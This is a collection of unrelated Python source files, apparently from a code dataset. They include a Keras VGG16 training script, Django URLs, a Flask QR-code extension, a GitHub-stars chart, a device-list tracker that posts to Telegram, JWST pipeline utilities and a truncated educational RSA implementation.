momentum=0.0, nesterov=False, name='SGD')\n\n VGG16_cnn_model.compile(loss = i[0],\n optimizer = sgd,\n metrics = ['accuracy'])\n \n model_summary = VGG16_cnn_model.summary()\n print(model_summary)\n\n\n ############################################################\n # Train Model:\n ############################################################\n\n batch_size = 128\n training_size = 2148\n testing_size = 538\n epochs = 5\n\n fn_steps_per_epoch = lambda x: int(math.ceil(1. * x / batch_size))\n steps_per_epoch = fn_steps_per_epoch(training_size)\n test_steps = fn_steps_per_epoch(testing_size)\n\n # Extract dataset from folder:\n train_datagen = ImageDataGenerator(rescale = 1/255)\n test_datagen = ImageDataGenerator(rescale = 1/255)\n\n # get training images\n train_gen = train_datagen.flow_from_directory(\n r'.\\cleaned_data\\train',\n target_size = (32, 32),\n batch_size = batch_size,\n class_mode = 'binary'\n )\n\n # get testing images\n test_gen = test_datagen.flow_from_directory(\n r'.\\cleaned_data\\test',\n target_size = (32, 32),\n batch_size = batch_size,\n class_mode = 'binary'\n )\n\n # train model\n history = VGG16_cnn_model.fit(\n train_gen,\n steps_per_epoch = steps_per_epoch,\n epochs = epochs,\n validation_data = test_gen,\n validation_steps = test_steps\n )\n\n ############################################################\n # Export Model to working Directory:\n ############################################################\n\n model_name_loc = r\".\\saved_models\\VGG16_\" + str(i[0]) + str(i[1])\n model_weights_loc = r\".\\saved_models\\VGG16_\" + str(i[0]) + str(i[1] + \"_weights\")\n\n VGG16_cnn_model.save(model_name_loc)\n VGG16_cnn_model.save_weights(model_weights_loc) \n\n","sub_path":"scripts/train_VGG16.py","file_name":"train_VGG16.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"423170572","text":"# coding=utf-8\n\nimport pandas as pd\n\n\nclass MzData:\n def read(self, csv: str,\n start_symbol: str=\"s\", goal_symbol: str=\"g\", flag_symbol: str=\"f\"):\n df = pd.read_csv(csv, dtype='str', index_col='row')\n self.shape = df.shape\n\n df_fg = df == flag_symbol\n df_start = df == start_symbol\n df_goal = df == goal_symbol\n self.flags = []\n self.walls = []\n\n for row in range(-1, df.shape[0]+1):\n for col in range(-1, df.shape[1]+1):\n if 0 <= row < df.shape[0] and 0 <= col < df.shape[1]:\n pass\n else:\n self.walls.append([row, col])\n\n for row in range(df.shape[0]):\n for col in range(df.shape[1]):\n if df_fg.iat[row, col]:\n self.flags.append([row, col])\n if df_start.iat[row, col]:\n self.start = [row, col]\n if df_goal.iat[row, col]:\n self.goal = [row, col]","sub_path":"maze/mz_data.py","file_name":"mz_data.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"437475388","text":"from config.config import mongo\n\nclass Dampak():\n __schema = {\n \"kppn\": \"156\",\n \"level\": \"\",\n \"level_desc\": \"\",\n \"area_dampak\": {\n \"fraud\": \"\",\n \"non_fraud\": \"\"\n },\n \"reputasi\": [],\n \"sanksi\": \"\",\n \"kecelakaan\": \"\",\n \"gangguan\": \"\",\n \"kinerja\": \"\"\n }\n\n\n def find(self):\n try:\n query = mongo.db.dampak.find()\n except:\n raise Exception('db connection error')\n \n parsed_cursor = []\n\n for parsed in query:\n parsed['_id'] = str(parsed['_id'])\n parsed_cursor.append(parsed)\n\n return parsed_cursor\n\n\n def insert(self, dampak_object):\n try:\n mongo.db.dampak.insert(dampak_object)\n except:\n raise Exception('db connection error')\n \n return {\n \"status\": \"success\"\n }\n\n\n def update(self, dampak_object):\n try:\n mongo.db.dampak.update(dampak_object['query'], dampak_object['data'])\n except:\n raise Exception('db connection error')\n \n return {\n \"status\": \"success\"\n }\n\n def delete(self, delete_criteria):\n try:\n mongo.db.dampak.delete_one(delete_criteria)\n except:\n raise Exception('db connection error')\n\n return {\n \"status\": \"success\"\n }","sub_path":"models/dampak.py","file_name":"dampak.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"525502701","text":"from datetime import datetime\nfrom django.conf.urls import url\nimport django.contrib.auth.views\n\nimport app.forms\nimport app.views\nfrom django.conf.urls import include\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^$', app.views.home, name='home'),\n url(r'^saskaita', app.views.SaskaitaView.as_view(), name='saskaita'),\n url(r'^duomenys', app.views.DuomenysView.as_view(), name='duomenys'),\n url(r'^nurasymas', app.views.NurasymasView.as_view(), name='nurasymas'),\n url(r'^ruosiniai', app.views.RuosiniaiView.as_view(), name='ruosiniai'),\n url(r'^account', app.views.AccountView.as_view(), name='account'),\n url(r'^login/$',\n django.contrib.auth.views.login,\n {\n 'template_name': 'app/login.html',\n 'authentication_form': app.forms.BootstrapAuthenticationForm,\n 'extra_context':\n {\n 'title': 'PVM saskaitu tvarkymo sistema',\n 'year': datetime.now().year,\n }\n },\n name='login'),\n url(r'^logout$',\n django.contrib.auth.views.logout,\n {\n 'next_page': '/',\n },\n name='logout'),\n\n url(r'^admin/', include(admin.site.urls))\n]\n","sub_path":"Python/Python_5/DjangoWebsite/DjangoWebsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"98253736","text":"import requests\nimport pygal\nfrom pygal.style import LightColorizedStyle as LCS, LightenStyle as LS\n\n#执行API调用并存储相应\nurl = 'https://api.github.com/search/repositories?q=language:python&sort=stars'\nr = requests.get(url)\nprint(\"Status code:\", r.status_code) #状态码200表示成功\n\nresponse_dict = r.json() # 将API响应为json格式,转换为python字典\nprint(\"Total repositories: \",response_dict['total_count']) #GitHub包含py仓库总数\n\nrepo_dicts=response_dict[\"items\"] #返回的仓库字典的列表\n\nnames, plot_dicts=[],[] \nfor repo_dict in repo_dicts:\n names.append(repo_dict[\"name\"])\n plot_dict={\"value\":repo_dict[\"stargazers_count\"], \n \"label\":str(repo_dict[\"description\"]),\n \"xlink\":str(repo_dict[\"html_url\"])} #注意这里的str函数\n plot_dicts.append(plot_dict)\n\n#可视化\nmy_style = LS('#333366', base_style=LCS)\nmy_config = pygal.Config()\nmy_config.x_label_rotation = 45\nmy_config.show_legend = False\nmy_config.title_font_size = 24\nmy_config.label_font_size = 14\nmy_config.major_label_font_size = 18\nmy_config.truncate_label = 15 #缩减长标签为15字符,鼠标悬停显示全称\nmy_config.show_y_guides = False #隐去水平虚线\nmy_config.width = 1000\nchart = pygal.Bar(my_config, style=my_style)\nchart.title = 'Most-Starred Python Projects on GitHub'\nchart.x_labels = names\nchart.add('', plot_dicts)\nchart.render_to_file('python_repos2.svg')","sub_path":"mycodes/chapter17/python_repos2.py","file_name":"python_repos2.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"10229585","text":"import sys\nsys.stdin = open(\"4_이진힙\", \"r\")\n\ndef insert(n):\n # 일단 바로 뒤에 넣고, 최소힙이니까, 부모보다 작으면 계속 올라가야함\n G.append(nums[n])\n p = n # 내 위치를 p에 저장하고\n # 내 위치가 0보다 크면서 부모가 나보다 크면 바꿔야함\n while(p > 0 and G[p//2] > G[p]): # 만약 부모가 더 크면 => 부모와 위치 바꿔\n temp = G[p//2]\n G[p//2] = G[p]\n G[p] = temp\n p = p//2 # 그리고 이제 내위치가 부모위치, 그럼 또 그 위의 부모랑 비교해서 올라가야함\n\nT = int(input())\nfor t in range(1, T+1):\n n = int(input())\n nums = list(map(int, input().split()))\n nums.insert(0,0)\n G = [0]\n\n for i in range(1, n+1):\n # 리스트가 비어있으면 그냥 첫번째에 넣고\n if i == 1 :\n G.append(nums[i])\n # 아니면 앞의 노드들과 비교해서 넣어야함\n else: insert(i)\n\n sum1 = 0\n p = len(G)-1\n while p > 0:\n sum1 += G[p//2]\n p = p//2\n print(f\"#{t} {sum1}\")\n\n\n\n","sub_path":"day16-Tree/4_이진힙.py","file_name":"4_이진힙.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"442801303","text":"import json\nfrom backends.abstract_backend import AbstractBackend\n\nFILENAME = 'links_db.json'\n\n\nclass JSONBackend(AbstractBackend):\n def __init__(self):\n super().__init__()\n self._load_data()\n\n def _load_data(self):\n try:\n with open(FILENAME) as file:\n self.storage = json.load(file)\n except FileNotFoundError:\n self.storage = {}\n\n def close(self):\n with open(FILENAME, 'w') as file:\n json.dump(self.storage, file, indent=2)\n","sub_path":"Lesson10/backends/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"162480012","text":"#!/usr/bin/env python3.7\n\"\"\"Google certified android devices tracker\"\"\"\n\nimport difflib\nimport json\nfrom datetime import date\nfrom os import rename, path, system, environ\nfrom requests import get, post\n\nGIT_OAUTH_TOKEN = environ['GIT_OAUTH_TOKEN_XFU']\nBOT_TOKEN = environ['bottoken']\nTODAY = str(date.today())\n\n\ndef fetch():\n \"\"\"\n Download latest and convert to utf-8\n \"\"\"\n url = \"http://storage.googleapis.com/play_public/supported_devices.csv\"\n response = get(url)\n data = (response.content.decode('utf-16'))\n data_list = list(data.split('\\n'))\n with open('README.md', 'w', encoding=\"utf-8\") as markdown,\\\n open('devices.json', 'w') as json_out:\n markdown.write('# Google Play Certified Android devices\\n')\n markdown.write('Last sync is {}\\n\\nhttps://support.google.com/googleplay/'\n 'answer/1727131?hl=en\\n\\n'.format(TODAY))\n markdown.write('|Retail Branding|Marketing Name|Device|Model|\\n')\n markdown.write('|---|---|---|---|\\n')\n devices = []\n for line in data_list[1:]:\n i = line.strip().replace(\" \", \" \").split(\",\")\n try:\n brand = i[0]\n name = i[1]\n device = i[2]\n model = i[3]\n markdown.write('|{}|{}|{}|{}|\\n'.format(brand, name, device, model))\n devices.append({'brand': brand, 'name': name, 'device': device, 'model': model})\n except IndexError:\n pass\n json.dump(devices, json_out, indent=1)\n\n\ndef diff_files():\n \"\"\"\n diff\n \"\"\"\n with open('old.md', 'r') as old, open('README.md', 'r') as new:\n diff = difflib.unified_diff(old.readlines(), new.readlines(), fromfile='old', tofile='new')\n changes = []\n for line in diff:\n if line.startswith('+'):\n changes.append(str(line))\n new = ''.join(changes[2:]).replace(\"+\", \"\")\n with open('changes', 'w') as out:\n out.write(new)\n\n\ndef post_to_tg():\n \"\"\"\n post new devices to telegram channel\n \"\"\"\n # tg\n telegram_chat = \"@CertifiedAndroidDevices\"\n with open('changes', 'r') as changes:\n for line in changes:\n info = line.split(\"|\")\n brand = info[1]\n name = info[2]\n codename = info[3]\n model = info[4]\n telegram_message = f\"New certified device added!: \\n\" \\\n f\"Brand: *{brand}*\\n\" \\\n f\"Name: *{name}*\\n\" \\\n f\"*Codename:* `{codename}`\\n\" \\\n f\"Model: *{model}*\"\n params = (\n ('chat_id', telegram_chat),\n ('text', telegram_message),\n ('parse_mode', \"Markdown\"),\n ('disable_web_page_preview', \"yes\")\n )\n telegram_url = \"https://api.telegram.org/bot\" + BOT_TOKEN + \"/sendMessage\"\n telegram_req = post(telegram_url, params=params)\n telegram_status = telegram_req.status_code\n if telegram_status == 200:\n print(\"{0}: Telegram Message sent\".format(name))\n else:\n print(\"Telegram Error\")\n\n\ndef git_commit_push():\n \"\"\"\n git add - git commit - git push\n \"\"\"\n system(\"git add README.md devices.json && git -c \\\"user.name=XiaomiFirmwareUpdater\\\" \"\n \"-c \\\"user.email=xiaomifirmwareupdater@gmail.com\\\" \"\n \"commit -m \\\"[skip ci] sync: {0}\\\" && \"\" \\\n \"\"git push -q https://{1}@github.com/androidtrackers/\"\n \"certified-android-devices.git HEAD:master\"\n .format(TODAY, GIT_OAUTH_TOKEN))\n\n\ndef main():\n \"\"\"\n certified-android-devices tracker\n \"\"\"\n if path.exists('README.md'):\n rename('README.md', 'old.md')\n fetch()\n diff_files()\n post_to_tg()\n git_commit_push()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"189601553","text":"from .base import FunctionalTest\n\nclass InspectGameTest(FunctionalTest):\n def select_message_node(self, svg_circle_element):\n svg_circle_element.find_element_by_xpath(\"..\").click()\n\n def test_inspect_game(self):\n \"\"\"Marcus looks at the results of an ongoing game.\"\"\"\n game_name = 'In Progress Game'\n self.create_game(game_name, nchains=4, depth=4)\n\n # Marcus goes to the games list and inspects the game\n self.nav_to_games_list()\n self.inspect_game(game_name)\n\n # He sees the nodes rendered on the svg element\n nodes = self.select_svg_nodes()\n # 1 game node, 4 chain nodes, and each chain has 1 seed and 4 children\n expected_num_nodes = 1 + 4 + (4 * 5)\n self.assertEquals(len(nodes), expected_num_nodes)\n\n def test_close_chain(self):\n \"\"\"Marcus decides to close a branch.\"\"\"\n game_name = 'Dead End Game'\n self.create_game(game_name, nchains=1, depth=1)\n\n self.nav_to_games_list()\n self.inspect_game(game_name)\n\n # He selects one of the child nodes.\n nodes = self.select_svg_nodes()\n expected_num_nodes = 1 + 1 + 2\n self.assertEquals(len(nodes), expected_num_nodes)\n\n message_nodes = self.select_message_nodes()\n self.assertEquals(len(message_nodes), 2)\n\n seed_message = message_nodes[0]\n self.select_message_node(seed_message)\n\n # He presses the button to edit it.\n\n # He changes the number of children to 0.\n\n # He saves his changes.\n\n # The node now shows that it is rejected, and that it is closed.\n","sub_path":"ftests/test_inspect_game.py","file_name":"test_inspect_game.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"367389777","text":"\"\"\"\nThis script tests the savings from using lru cache.\n\"\"\"\n\nimport functools\n\nclass MyVision:\n counter = 0\n\n @functools.lru_cache(maxsize=int(2**8))\n def my_dummy_calc(self, x, y, z):\n if x.x > y.x:\n return self.my_dummy_calc(y, x, z)\n self.counter+=1\n return x\n\nfrom collections import namedtuple\n\nquack = namedtuple(\"quack\", \"x y\")\n\nm = MyVision()\n\nquacks = list()\nfor i in range(8):\n for j in range(8):\n quacks.append( quack(i,j) )\n\nimport random\n\nresults = []\n\nqs = quacks[:5]\n\nwhile len(results) < 500_000:\n if random.random() < 0.9:\n q1 = random.choice(qs)\n q2 = random.choice(qs)\n q3 = random.choice(qs)\n\n else:\n q1 = random.choice(quacks)\n q2 = random.choice(quacks)\n q3 = random.choice(quacks)\n\n results.append(m.my_dummy_calc(q1,q2,q3))\n\nprint(m.counter)\n\n\n\n","sub_path":"tests/_conceptual/lru_cache.py","file_name":"lru_cache.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"45471059","text":"# Copyright (C) 2010 Association of Universities for Research in Astronomy(AURA)\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n#\n# 3. The name of AURA and its representatives may not be used to\n# endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY AURA ``AS IS'' AND ANY EXPRESS OR IMPLIED\n# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL AURA BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS\n# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\n# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\n# DAMAGE.\n\"\"\"\nUtilities\n\"\"\"\nfrom copy import copy\nfrom importlib import import_module\nimport inspect\nimport logging\nimport os\nimport re\nimport sys\n\nfrom . import entry_points\n\n# Configure logging\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n# Step classes that are not user-api steps\nNON_STEPS = [\n 'EngDBLogStep',\n 'FunctionWrapper',\n 'Pipeline',\n 'Step',\n 'SystemCall',\n]\n\n\ndef resolve_step_class_alias(name):\n \"\"\"\n If the input is a recognized alias, return the\n corresponding fully-qualified class name. Otherwise\n return the input unmodified.\n\n Parameters\n ----------\n name : str\n\n Returns\n -------\n str\n \"\"\"\n for info in entry_points.get_steps():\n if info.class_alias is not None and name == info.class_alias:\n return info.class_name\n\n return name\n\n\ndef import_class(full_name, subclassof=object, config_file=None):\n \"\"\"\n Import the Python class `full_name` given in full Python package format,\n e.g.::\n\n package.another_package.class_name\n\n Return the imported class. Optionally, if `subclassof` is not None\n and is a Python class, make sure that the imported class is a\n subclass of `subclassof`.\n \"\"\"\n # Understand which class we need to instantiate. The class name is given in\n # full Python package notation, e.g.\n # package.subPackage.subsubpackage.className\n # in the input parameter `full_name`. This means that\n # 1. We HAVE to be able to say\n # from package.subPackage.subsubpackage import className\n # 2. If `subclassof` is defined, the newly imported Python class MUST be a\n # subclass of `subclassof`, which HAS to be a Python class.\n\n if config_file is not None:\n sys.path.insert(0, os.path.dirname(config_file))\n\n try:\n full_name = full_name.strip()\n package_name, sep, class_name = full_name.rpartition('.')\n if not package_name:\n raise ImportError(\"{0} is not a Python class\".format(full_name))\n imported = __import__(\n package_name, globals(), locals(), [class_name, ], level=0)\n\n step_class = getattr(imported, class_name)\n\n if not isinstance(step_class, type):\n raise TypeError(\n 'Object {0} from package {1} is not a class'.format(\n class_name, package_name))\n elif not issubclass(step_class, subclassof):\n raise TypeError(\n 'Class {0} from package {1} is not a subclass of {2}'.format(\n class_name, package_name, subclassof.__name__))\n finally:\n if config_file is not None:\n del sys.path[0]\n\n return step_class\n\n\ndef get_spec_file_path(step_class):\n \"\"\"\n Given a Step (sub)class, divine and return the full path to the\n corresponding spec file. Use the fact that by convention, the spec\n file is in the same directory as the `step_class` source file. It\n has the name of the Step (sub)class and extension .spec.\n \"\"\"\n try:\n step_source_file = inspect.getfile(step_class)\n except TypeError:\n return None\n step_source_file = os.path.abspath(step_source_file)\n\n # Since `step_class` could be defined in a file called whatever,\n # we need the source file basedir and the class name.\n dir = os.path.dirname(step_source_file)\n return os.path.join(dir, step_class.__name__ + '.spec')\n\n\ndef find_spec_file(step_class):\n \"\"\"\n Return the full path of the given Step subclass `step_class`, if\n it exists or None if it does not.\n \"\"\"\n spec_file = get_spec_file_path(step_class)\n if spec_file is not None and os.path.exists(spec_file):\n return spec_file\n return None\n\n\ndef islist_tuple(obj):\n \"\"\"\n Return True if `obj` is either a list or a tuple. False otherwise.\n \"\"\"\n return isinstance(obj, tuple) or isinstance(obj, list)\n\n\ndef all_steps():\n \"\"\"List all classes subclassed from Step\n\n Returns\n -------\n steps : dict\n Key is the classname, value is the class\n \"\"\"\n from jwst.stpipe import Step\n\n jwst = import_module('jwst')\n jwst_fpath = os.path.split(jwst.__file__)[0]\n\n steps = {}\n for module in load_local_pkg(jwst_fpath):\n more_steps = {\n klass_name: klass\n for klass_name, klass in inspect.getmembers(\n module,\n lambda o: inspect.isclass(o) and issubclass(o, Step)\n )\n if klass_name not in NON_STEPS\n }\n steps.update(more_steps)\n\n return steps\n\n\ndef load_local_pkg(fpath):\n \"\"\"Generator producing all modules under fpath\n\n Parameters\n ----------\n fpath: string\n File path to the package to load.\n\n Returns\n -------\n generator\n `module` for each module found in the package.\n \"\"\"\n package_fpath, package = os.path.split(fpath)\n package_fpath_len = len(package_fpath) + 1\n sys_path = copy(sys.path)\n sys.path.insert(0, package_fpath)\n try:\n for module_fpath in folder_traverse(\n fpath, basename_regex=r'[^_].+\\.py$', path_exclude_regex='tests'\n ):\n folder_path, fname = os.path.split(module_fpath[package_fpath_len:])\n module_path = folder_path.split('/')\n module_path.append(os.path.splitext(fname)[0])\n module_path = '.'.join(module_path)\n try:\n module = import_module(module_path)\n except Exception as err:\n logger.debug(f'Cannot load module \"{module_path}\": {str(err)}')\n else:\n yield module\n except Exception as err:\n logger.debug(f'Cannot complete package loading: Exception occurred: \"{str(err)}\"')\n finally:\n sys.path = sys_path\n\n\ndef folder_traverse(folder_path, basename_regex='.+', path_exclude_regex='^$'):\n \"\"\"Generator of full file paths for all files\n in a folder.\n\n Parameters\n ----------\n folder_path: str\n The folder to traverse\n\n basename_regex: str\n Regular expression that must match\n the `basename` part of the file path.\n\n path_exclude_regex: str\n Regular expression to exclude a path.\n\n Returns\n -------\n generator\n A generator, return the next file.\n \"\"\"\n basename_regex = re.compile(basename_regex)\n path_exclude_regex = re.compile(path_exclude_regex)\n for root, dirs, files in os.walk(folder_path):\n if path_exclude_regex.search(root):\n continue\n for file in files:\n if basename_regex.match(file):\n yield os.path.join(root, file)\n","sub_path":"jwst/stpipe/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":8140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"241486437","text":"import os\nfrom sys import platform, stdout\nfrom time import sleep\n\n\n#-------------------------------------------\n# Logic Functions\nfrom getText import *\nfrom slowPrint import *\nfrom printLines import *\nfrom clearScreen import *\nfrom changeScreenSize import *\n\n\n# \"Waiting\" animation with dots. Allows control over the number of dots in each cycle, the amount of cycles, and the time between each dot.\ndef waitingDots(num_of_dots, num_of_loops, dot_speed, char):\n l = 0\n str = char * num_of_dots # All dots in 1 string\n while l < num_of_loops:\n for char in str: # Print each character in str with dot_speed amount of time in between\n print(char, end=\"\", flush=\"True\")\n sleep(dot_speed)\n for char in str: # Go back one space and clear it for each dot\n stdout.write(\"\\b\" * num_of_dots)\n stdout.write(\" \" * num_of_dots)\n stdout.write(\"\\b\" * num_of_dots)\n l = l + 1\n\n\n#-------------------------------------------\n# Story functions\n\nfrom story import *\n\n\n#-------------------------------------------\n# Start script\n\nchangeScreenSize(66, 38)\n\nprint(getText(\"txtimgs/tree.txt\"))\nprint(getText(\"txtimgs/helloyou.txt\"))\ninput(\"Press [ENTER] to start...\")\n\nsleep(1)\n\nchangeScreenSize(50, 4)\n\ntitle = \"Verhaal van een nieuwkomer\".center(50, \"-\")\nprint(\"\\n\"+title)\nloading = \"[»-(¯`·.·´¯)->...LOADING...<-(¯`·.·´¯)-«]\".center(50)\nslowPrint(loading, 0.01, 0.13)\nslowPrint(\"...\", 0.8, 0.8)\n\nchangeScreenSize(100, 25)\n\n\n#-------------------------------------------\n# Explanation\n\nprint('')\nprint(\"Uitleg\".center(100, \"-\"))\nsleep(0.5)\nprint('\\n\\n')\nprint('- Het spel bestaat uit stukjes verhaal (\"secties\") en vragen;'.center(100))\nsleep(1.5)\nprint('- Bij elke vraag kun je A, B en soms C antwoorden;'.center(100))\nsleep(1.5)\nprint('- De keuzes die je maakt beïnvloeden hoe het verhaal verloopt. Maak je keuzes aandachtig.'.center(100))\nsleep(2.5)\n\nx = input('\\n\\n\\n\\n\\n\\nOm het spel te starten, druk op [ENTER]. Om de credits te bekijken, typ \"credits\".\\n')\n\nclearScreen()\n\nif x.lower() == \"credits\":\n\n print('\\n')\n print('Credits'.center(100, \"-\"))\n print('\\n\\nDit keuzeverhaal spel is gemaakt door Mavis de Ridder uit klas SD1C van het Mediacollege Amsterdam, als eind-beroepsopdracht voor periode 1, jaar 1.')\n print('\\n\\nDe GitHub link voor dit project is: [https://github.com/pinkflamey/HelloYou]')\n\n input('Druk op [ENTER] om het spel te starten...')\n clearScreen()\n t1()\n \nelse:\n\n clearScreen()\n t1()","sub_path":"python/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"550547647","text":"n=int(input())\r\nflag=0\r\na=[]\r\ntf=[]\r\nvalue=0\r\nfor i in range(n):\r\n a=[]\r\n fine=0\r\n months=int(input())\r\n x=input()\r\n value=x.find('0')\r\n if value>=0:\r\n x=x[value:]\r\n a=x.split(' ')\r\n fine=0\r\n for j in a:\r\n j=int(j)\r\n if j==0:\r\n fine=fine+1100\r\n elif j==1:\r\n fine=fine+100\r\n tf.append(fine)\r\nfor k in tf:\r\n print(k,end=\"\\n\")\r\n \r\n","sub_path":"chefapr1.py","file_name":"chefapr1.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"330686330","text":"\"\"\"\nSupport PY3,Use BytesIO instead of StringIO\n\"\"\"\nfrom io import BytesIO\nimport base64\n\nfrom flask import render_template, Blueprint, Markup, url_for\nimport qrcode as qrc\n\ncorrection_levels = {\n 'L': qrc.constants.ERROR_CORRECT_L,\n 'M': qrc.constants.ERROR_CORRECT_M,\n 'Q': qrc.constants.ERROR_CORRECT_Q,\n 'H': qrc.constants.ERROR_CORRECT_H\n}\n\n\ndef qrcode(data, version=None, error_correction='L', box_size=10, border=0, fit=True):\n # makes qr image using qrcode as qrc\n qr = qrc.QRCode(\n version=version,\n error_correction=correction_levels[error_correction],\n box_size=box_size,\n border=border\n )\n qr.add_data(data)\n qr.make(fit=fit)\n\n # creates qrcode base64\n # io = StringIO()\n sio = BytesIO()\n qr_img = qr.make_image()\n qr_img.save(sio)\n return \"data:image/png;base64,\" + base64.b64encode(sio.getvalue()).decode()\n\n\nclass QRcode(object):\n\n def __init__(self, app=None, **kwargs):\n if app:\n self.init_app(app)\n\n def init_app(self, app):\n self.register_blueprint(app)\n app.add_template_filter(qrcode)\n app.add_template_global(qrcode)\n\n def register_blueprint(self, app):\n module = Blueprint('qrcode',\n __name__,\n template_folder='templates')\n app.register_blueprint(module)\n return module\n","sub_path":"flask_qrcode/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"396433903","text":"# RSA implementation based on http://code.activestate.com/recipes/577737-public-key-encryption-rsa/\n\nfrom random import randrange\nfrom collections import namedtuple\nfrom math import log\nfrom base64 import b64encode, b64decode\n\nPRIME_LOWER_BOUND = 10e3\nPRIME_UPPER_BOUND = 10e6\n\nKeyPair = namedtuple(\"KeyPair\", \"public private\")\nKey = namedtuple(\"Key\", \"exp mod\")\n\n# https://en.wikipedia.org/wiki/Euclidean_algorithm\ndef gcd(a, b):\n \"\"\"Retorna o maior divisor comum de a e b.\"\"\"\n while b != 0:\n a, b = b, a % b\n return a\n\ndef lcm(a, b):\n \"\"\"Retorna o menor múltiplo comum de a e b.\"\"\"\n return (a * b) // gcd(a, b)\n\n# https://en.wikipedia.org/wiki/Modular_expiation\ndef modular_pow(base, exp, mod):\n \"\"\"Retorna o valor de base elevado a exp no módulo mod.\"\"\"\n if mod == 1:\n return 0\n result = 1\n base = base % mod\n while exp > 0:\n if exp % 2 == 1:\n result = (result * base) % mod\n exp = exp // 2\n base = (base * base) % mod\n return result\n\n# https://en.wikipedia.org/wiki/Primality_test\ndef is_prime_naive(n):\n \"\"\"Retorna se o número n é primo. Implementação 'ingênua'.\"\"\"\n assert n >= 1\n if n == 1:\n return False\n if n == 2 or n == 3:\n return True\n if n % 2 == 0 or n % 3 == 0:\n return False\n i = 5\n while i * i <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True\n\n# https://en.wikipedia.org/wiki/Miller%E2%80%93Rabin_primality_test\ndef is_prime(n, k=30):\n \"\"\"Retorna se o número n é primo. Algoritmo de Miller-Rabin.\n O parâmetro k corresponde à acurácia do teste.\"\"\"\n\n assert n >= 1\n if n == 1:\n return False\n if n == 2 or n == 3:\n return True\n \n # escrever n-1 com d*(2^s), onde d é ímpar\n s, d = 0, n-1\n while d % 2 == 0:\n s, d = s + 1, d // 2\n assert (2 ** s) * d == n-1 and d % 2 == 1\n\n for i in range(k):\n a = randrange(2, n-1)\n x = modular_pow(a, d, n)\n if x == 1 or x == n-1:\n continue\n for r in range(1, s):\n x = (x * x) % n\n if x == 1:\n return False\n if x == n-1:\n break\n else:\n return False\n \n return True\n\ndef random_prime(lower, upper):\n \"\"\"Retorna um número primo no intervalo [lower, upper).\"\"\"\n p = 1\n while not is_prime(p):\n p = randrange(lower, upper)\n return p\n\n# http://en.wikipedia.org/wiki/Extended_Euclidean_algorithm\ndef multiplicative_inverse(a, mod):\n \"\"\"Retorna o inverso multiplicativo de a no módulo mod.\n É necessário que a e mod sejam primos entre si.\"\"\"\n assert gcd(a, mod) == 1\n\n x0, x1 = 0, 1\n r0, r1 = mod, a\n\n while r1 != 0:\n q = r0 // r1\n x0, x1 = x1, x0 - q * x1\n r0, r1 = r1, r0 - q * r1\n \n if x0 < 0:\n x0 += mod\n\n assert (x0 * a) % mod == 1\n\n return x0\n\ndef generate_keys(verbose=False):\n \"\"\"Gera chaves pública e secreta de acordo com o algoritmo RSA.\n Caso verbose seja verdadeiro, imprime parâmetros do algoritmo no console.\"\"\"\n\n p = random_prime(PRIME_LOWER_BOUND, PRIME_UPPER_BOUND)\n 